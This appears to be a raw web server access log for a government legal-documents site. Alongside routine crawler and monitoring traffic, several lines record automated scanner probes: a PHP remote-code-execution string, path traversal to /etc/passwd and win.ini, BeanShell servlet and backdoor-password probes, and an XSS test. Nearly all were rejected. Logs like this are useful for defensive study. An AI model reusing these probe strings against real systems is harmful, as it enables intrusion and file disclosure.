201.245.192.253 - - [27/Feb/2024:04:09:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:04:10:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.79.97 - - [27/Feb/2024:04:10:42 -0500] "GET /PDC/actos/1789.pdf HTTP/1.1" 200 1121404
216.245.221.92 - - [27/Feb/2024:04:11:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:04:11:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:04:12:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [27/Feb/2024:04:12:05 -0500] "GET /BLA/resoluciones/AUTOS%202023/0147.pdf HTTP/1.1" 200 503731
207.46.13.36 - - [27/Feb/2024:04:12:28 -0500] "GET /BLA/resoluciones/AUTOS%202023/08025.pdf HTTP/1.1" 200 403756
172.22.2.4 - - [27/Feb/2024:04:11:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [27/Feb/2024:04:12:54 -0500] "GET /BLA/resoluciones/AUTOS%202023/0273.pdf HTTP/1.1" 200 377424
201.245.192.253 - - [27/Feb/2024:04:13:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
172.22.2.4 - - [27/Feb/2024:04:11:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57136
216.244.66.195 - - [27/Feb/2024:04:13:38 -0500] "GET /BLA/resoluciones/AUTOS%202023/0352.pdf HTTP/1.1" 200 400653
201.245.192.253 - - [27/Feb/2024:04:13:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:04:14:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [27/Feb/2024:04:14:22 -0500] "GET /BLA/resoluciones/AUTOS%202023/0369.pdf HTTP/1.1" 200 443917
216.244.66.195 - - [27/Feb/2024:04:15:13 -0500] "GET /BLA/resoluciones/AUTOS%202023/0960.pdf HTTP/1.1" 200 412217
201.245.192.253 - - [27/Feb/2024:04:15:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [27/Feb/2024:04:16:03 -0500] "GET /BLA/resoluciones/AUTOS%202023/4166.pdf HTTP/1.1" 200 416637
201.245.192.253 - - [27/Feb/2024:04:16:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:04:16:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:04:17:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:04:17:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:04:18:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:04:16:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
223.26.103.16 - - [27/Feb/2024:04:19:01 -0500] "GET /s=set&_method=__construct&method=*&filter[]=system HTTP/1.1" 403 1023
223.26.103.16 - - [27/Feb/2024:04:19:15 -0500] "GET /api/dp/rptsvcsyncpoint?ccid=1 HTTP/1.1" 404 1035
223.26.103.16 - - [27/Feb/2024:04:19:17 -0500] "GET /install/ HTTP/1.1" 404 1035
223.26.103.16 - - [27/Feb/2024:04:19:21 -0500] "GET /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php HTTP/1.1" 404 1035
172.22.2.4 - - [27/Feb/2024:04:17:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
223.26.103.16 - - [27/Feb/2024:04:19:29 -0500] "\x16\x03\x01" 400 226
201.245.192.253 - - [27/Feb/2024:04:19:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:04:19:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39615
201.245.192.253 - - [27/Feb/2024:04:19:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37262
172.22.2.4 - - [27/Feb/2024:04:20:01 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-746-12.docx HTTP/1.1" 304 -
201.245.192.253 - - [27/Feb/2024:04:20:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39787
201.245.192.253 - - [27/Feb/2024:04:20:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
223.26.103.16 - - [27/Feb/2024:04:20:14 -0500] "POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1" 404 1035
223.26.103.16 - - [27/Feb/2024:04:20:21 -0500] "\x16\x03\x01" 400 226
172.22.2.4 - - [27/Feb/2024:04:20:24 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000009%20DEL%2010%20DE%20OCTUBRE%20DEL%202022.pdf HTTP/1.1" 200 292772
201.245.192.253 - - [27/Feb/2024:04:20:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37262
216.245.221.92 - - [27/Feb/2024:04:21:13 -0500] "HEAD / HTTP/1.1" 200 -
223.26.103.16 - - [27/Feb/2024:04:21:17 -0500] "GET /common/download/resource?resource=/profile/../../../../etc/passwd HTTP/1.1" 404 1035
201.245.192.253 - - [27/Feb/2024:04:21:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
114.119.135.172 - - [27/Feb/2024:04:21:50 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/RESOLUCIONES%2B2023/&sort=size&order=asc HTTP/1.1" 200 14374
201.245.192.253 - - [27/Feb/2024:04:22:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:04:22:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
172.22.2.4 - - [27/Feb/2024:04:21:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
172.22.2.4 - - [27/Feb/2024:04:23:38 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
201.245.192.253 - - [27/Feb/2024:04:23:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:04:24:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:04:22:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Feb/2024:04:23:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
201.245.192.253 - - [27/Feb/2024:04:25:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:04:26:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:04:26:13 -0500] "HEAD / HTTP/1.1" 200 -
223.26.103.16 - - [27/Feb/2024:04:26:34 -0500] "GET /s=set&_method=__construct&method=*&filter[]=system HTTP/1.1" 403 1010
125.228.250.59 - - [27/Feb/2024:04:27:46 -0500] "GET /api/dp/rptsvcsyncpoint?ccid=1 HTTP/1.1" 404 1022
201.245.192.253 - - [27/Feb/2024:04:27:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
125.228.250.59 - - [27/Feb/2024:04:27:49 -0500] "GET /s=set&_method=__construct&method=*&filter[]=system HTTP/1.1" 403 1022
125.228.250.59 - - [27/Feb/2024:04:27:50 -0500] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 404 1022
201.245.192.253 - - [27/Feb/2024:04:27:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:04:28:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
125.228.250.59 - - [27/Feb/2024:04:28:05 -0500] "\x16\x03\x01" 400 226
125.228.250.59 - - [27/Feb/2024:04:28:05 -0500] "POST /bsh.servlet.BshServlet HTTP/1.1" 404 1022
125.228.250.59 - - [27/Feb/2024:04:28:32 -0500] "GET /e/ViewImg/index.html?url=javascript:alert(1) HTTP/1.1" 404 1022
162.216.150.167 - - [27/Feb/2024:04:29:20 -0500] "GET / HTTP/1.1" 200 319
125.228.250.59 - - [27/Feb/2024:04:29:21 -0500] "\x16\x03\x01" 400 226
125.228.250.59 - - [27/Feb/2024:04:29:37 -0500] "\x16\x03\x01" 400 226
201.245.192.253 - - [27/Feb/2024:04:29:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:04:29:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39615
201.245.192.253 - - [27/Feb/2024:04:29:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37262
125.228.250.59 - - [27/Feb/2024:04:29:57 -0500] "\x16\x03\x01" 400 226
201.245.192.253 - - [27/Feb/2024:04:30:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39787
201.245.192.253 - - [27/Feb/2024:04:30:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:04:28:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
125.228.250.59 - - [27/Feb/2024:04:30:24 -0500] "GET /webui/?g=sys_dia_data_down&file_name=../etc/passwd HTTP/1.1" 404 1022
201.245.192.253 - - [27/Feb/2024:04:30:51 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [27/Feb/2024:04:30:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37262
172.22.2.4 - - [27/Feb/2024:04:29:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
216.245.221.92 - - [27/Feb/2024:04:31:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:04:31:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
125.228.250.59 - - [27/Feb/2024:04:31:50 -0500] "\x16\x03\x01" 400 226
201.245.192.253 - - [27/Feb/2024:04:32:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:04:32:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:04:33:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:04:34:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.167 - - [27/Feb/2024:04:35:40 -0500] "GET /robots.txt HTTP/1.1" 404 1035
66.249.66.165 - - [27/Feb/2024:04:35:40 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110175
66.249.66.166 - - [27/Feb/2024:04:35:44 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
66.249.66.166 - - [27/Feb/2024:04:35:46 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
201.245.192.253 - - [27/Feb/2024:04:35:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
52.167.144.4 - - [27/Feb/2024:04:35:56 -0500] "GET /images/INTRANET.jpg HTTP/1.1" 200 37297
201.245.192.253 - - [27/Feb/2024:04:36:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:04:34:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [27/Feb/2024:04:36:13 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Feb/2024:04:35:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
201.245.192.253 - - [27/Feb/2024:04:37:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
140.120.136.14 - - [27/Feb/2024:04:37:47 -0500] "\x16\x03\x01" 400 226
201.245.192.253 - - [27/Feb/2024:04:37:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:04:38:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [27/Feb/2024:04:38:40 -0500] "GET /robots.txt HTTP/1.1" 404 1018
66.249.79.107 - - [27/Feb/2024:04:39:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/5977.pdf HTTP/1.1" 200 289299
140.120.136.14 - - [27/Feb/2024:04:39:28 -0500] "\x16\x03\x01" 400 226
201.245.192.253 - - [27/Feb/2024:04:39:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:04:39:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39615
201.245.192.253 - - [27/Feb/2024:04:39:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37262
201.245.192.253 - - [27/Feb/2024:04:40:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39787
201.245.192.253 - - [27/Feb/2024:04:40:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
140.120.136.14 - - [27/Feb/2024:04:40:05 -0500] "\x16\x03\x01" 400 226
140.120.136.14 - - [27/Feb/2024:04:40:22 -0500] "GET /common/download/resource?resource=/profile/../../../../Windows/win.ini HTTP/1.1" 404 1034
201.245.192.253 - - [27/Feb/2024:04:40:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37262
216.245.221.92 - - [27/Feb/2024:04:41:13 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:04:41:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
162.55.175.158 - - [27/Feb/2024:04:41:55 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Feb/2024:04:40:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:04:42:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:04:41:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
201.245.192.253 - - [27/Feb/2024:04:42:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
201.245.192.253 - - [27/Feb/2024:04:43:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:04:44:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:04:45:31 -0500] "GET /BLA/boletinlegal/s=set&_method=__construct&method=*&filter%5B%5D=system HTTP/1.1" 403 1026
201.245.192.253 - - [27/Feb/2024:04:45:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:04:46:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:04:46:13 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Feb/2024:04:46:53 -0500] "GET /BLA/boletinlegal/api/dp/rptsvcsyncpoint?ccid=1 HTTP/1.1" 404 1038
172.22.2.4 - - [27/Feb/2024:04:47:14 -0500] "GET /BLA/boletinlegal/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php HTTP/1.1" 404 1038
172.22.2.4 - - [27/Feb/2024:04:47:20 -0500] "GET /BLA/boletinlegal/authenticationserverservlet HTTP/1.1" 404 1038
172.22.2.4 - - [27/Feb/2024:04:47:42 -0500] "POST /BLA/boletinlegal/webadm/?q=moni_detail.do&action=gragh HTTP/1.1" 404 1038
172.22.2.4 - - [27/Feb/2024:04:47:45 -0500] "GET /BLA/boletinlegal/include/thumb.php?dir=http\\..\\admin\\login\\login_check.php HTTP/1.1" 404 1038
172.22.2.4 - - [27/Feb/2024:04:46:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:04:47:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:04:47:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
172.22.2.4 - - [27/Feb/2024:04:48:01 -0500] "GET /BLA/boletinlegal/e/ViewImg/index.html?url=javascript:alert(1) HTTP/1.1" 404 1038
66.249.79.107 - - [27/Feb/2024:04:48:04 -0500] "GET /resoluciones/RESOLUCIONES%202008/2956.pdf HTTP/1.1" 404 1018
201.245.192.253 - - [27/Feb/2024:04:48:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:04:48:14 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
172.22.2.4 - - [27/Feb/2024:04:48:14 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
172.22.2.4 - - [27/Feb/2024:04:48:24 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000003%20DEL%2007%20DE%20MARZO%20DEL%202022.pdf HTTP/1.1" 304 -
172.22.2.4 - - [27/Feb/2024:04:46:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
168.119.100.88 - - [27/Feb/2024:04:49:23 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [27/Feb/2024:04:49:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:04:49:52 -0500] "GET /BLA/boletinlegal/webui/?g=sys_dia_data_down&file_name=../etc/passwd HTTP/1.1" 404 1038
201.245.192.253 - - [27/Feb/2024:04:50:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:04:51:12 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:04:51:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:04:52:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:04:52:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
172.22.2.4 - - [27/Feb/2024:04:51:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:04:53:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.79.96 - - [27/Feb/2024:04:53:49 -0500] "GET /BLA/resoluciones/AUTOS%202008/1968.pdf HTTP/1.1" 200 88322
201.245.192.253 - - [27/Feb/2024:04:54:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:04:52:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
201.245.192.253 - - [27/Feb/2024:04:55:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:04:56:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [27/Feb/2024:04:56:12 -0500] "HEAD / HTTP/1.1" 200 -
103.149.26.240 - - [27/Feb/2024:04:57:26 -0500] "GET / HTTP/1.1" 200 4720
103.149.26.240 - - [27/Feb/2024:04:57:33 -0500] "GET /favicon.ico HTTP/1.1" 404 1034
103.149.26.240 - - [27/Feb/2024:04:57:34 -0500] "GET /js/url.js HTTP/1.1" 404 1034
103.149.26.240 - - [27/Feb/2024:04:57:34 -0500] "GET /js/jquery-3.3.1.min.js HTTP/1.1" 404 1034
103.149.26.240 - - [27/Feb/2024:04:57:35 -0500] "GET /js/bootstrap.min.js HTTP/1.1" 404 1034
103.149.26.240 - - [27/Feb/2024:04:57:35 -0500] "GET /js/main.js HTTP/1.1" 404 1034
199.16.157.180 - - [27/Feb/2024:04:57:36 -0500] "GET /images/pl%C3%A1sticos%20foto%201..jpg HTTP/1.1" 404 1034
201.245.192.253 - - [27/Feb/2024:04:57:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [27/Feb/2024:04:57:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39776
66.249.79.96 - - [27/Feb/2024:04:58:02 -0500] "GET /resoluciones/RESOLUCIONES%202008/5405.pdf HTTP/1.1" 404 1018
201.245.192.253 - - [27/Feb/2024:04:58:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:04:57:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [27/Feb/2024:04:57:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [27/Feb/2024:04:57:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:04:59:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.79.96 - - [27/Feb/2024:04:59:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7410.pdf HTTP/1.1" 200 847032
201.245.192.253 - - [27/Feb/2024:05:00:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [27/Feb/2024:04:58:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
216.245.221.92 - - [27/Feb/2024:05:01:12 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Feb/2024:05:01:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
